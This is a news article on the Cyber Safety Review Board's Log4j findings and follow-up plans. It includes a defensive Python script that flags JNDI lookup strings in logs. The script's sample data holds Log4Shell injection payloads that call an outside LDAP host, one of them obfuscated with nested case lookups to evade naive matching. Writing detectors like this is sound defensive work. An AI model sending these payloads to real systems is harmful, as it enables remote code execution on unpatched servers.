Cyber Safety Review Board Improving Processes Following Log4j Investigation
During the Black Hat cybersecurity conference, CSRB Chair Rob Silvers, who is also the undersecretary of homeland security for strategy, policy and plans, acknowledged that the initial review of the vulnerability demonstrated the effectiveness of the concept behind the board's work, but noted that more actions are needed to further refine the assessment process. CSRB's plan includes creating crowdsourced lists on GitHub of products that use the vulnerable Log4j code, SC Media reported.
CSRB released its initial report on the Log4j flaw in December 2021. According to the document, the vulnerability in the Java-based logging framework developed by the Apache Software Foundation resulted from the addition of Java Naming and Directory Interface (JNDI) lookup plug-in support. JNDI features used in the configuration, log messages and parameters do not protect against attacker-controlled Lightweight Directory Access Protocol (LDAP) and other JNDI-related endpoints, meaning bad actors can inject malicious log messages that enable arbitrary code execution and exploitation of a vulnerable system.
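Because the lookup is triggered by text that lands in a log message, one defensive check a log-ingestion pipeline can run is to flag lines that contain a JNDI lookup string. The following is an added example written for this article, not code from the CSRB report or the Log4j project; the log lines are constructed, and the normalisation step only handles the case-transform lookups shown in the sample.

```python
import re

# Constructed sample access-log lines (not taken from the article). The third
# line spells the lookup through nested ${lower:...} lookups, which Log4j
# resolves before the outer lookup runs, so a naive substring match misses it.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET /login" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '10.0.0.3 - - "GET /search?q=${env:HOME}" 200 "curl/7.79"',
]

# Innermost ${lower:x} / ${upper:x} lookups (no further ${...} nesting inside).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
# The JNDI lookup prefix, matched case-insensitively after normalisation.
_JNDI_PREFIX = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Collapse ${lower:x}/${upper:x} lookups, innermost first, until the
    text stops changing, so the literal text they resolve to is visible."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line carries a JNDI lookup, plain or via case-transform nesting."""
    return bool(_JNDI_PREFIX.search(normalize_lookups(line)))


def find_jndi_lookups(lines):
    """Return the indexes of log lines that should be flagged for review."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for i in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"flagged line {i}: {SAMPLE_LOG_LINES[i]}")
```

The `${env:HOME}` line is deliberately not flagged: it is a lookup, but not a JNDI one, so the check stays specific to the class of message the report describes.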
The report stated that the Log4j flaw is an endemic vulnerability that will “remain in systems for many years to come.”
According to Silvers, the Department of Homeland Security is already working to implement some recommendations to address the Log4j issue, including allowing IT personnel to allot time to maintain open-source software projects and collaborating with educational institutions to make cybersecurity a priority in their computer science degree courses.